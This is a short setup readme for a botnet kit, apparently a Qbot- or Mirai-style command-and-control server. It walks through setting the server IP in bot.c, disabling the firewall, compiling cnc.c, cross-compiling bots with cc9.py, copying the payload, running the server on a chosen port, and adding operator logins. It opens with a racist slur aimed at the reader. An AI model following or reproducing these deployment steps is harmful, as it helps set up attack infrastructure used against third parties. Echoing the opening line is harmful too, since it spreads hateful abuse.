AYO OKAY SO YOU FAT PAKI FUCK.

============================================================
Step 1. change the ip in bot.c on line 39 to your server IP
============================================================

===========================================================================================
Step 2. COPY PASTE: yum install python-paramiko nano screen gcc perl wget lbzip unzip -y
===========================================================================================


Step 3.
======================== 
service httpd restart 
service iptables stop
========================

======================================= 
Step 4. gcc cnc.c -o server -pthread
=======================================

=====================================
Step 5. python cc9.py bot.c SERVER IP
=====================================

=====================================
Step 6. COPY YOUR FUCKING PAYLOAD
=====================================

===============================================================================
Step 7. screen ./server 666 1 47  [the 47 can be any number from 1-900] (The number you changed the 47 to will be your connect port)
===============================================================================

After you screened press CTRL + D


To add logins do

nano login.txt

Format to add users:

username password

When user is added press CTRL + X  (DO THIS IN THE VPS SERVER)

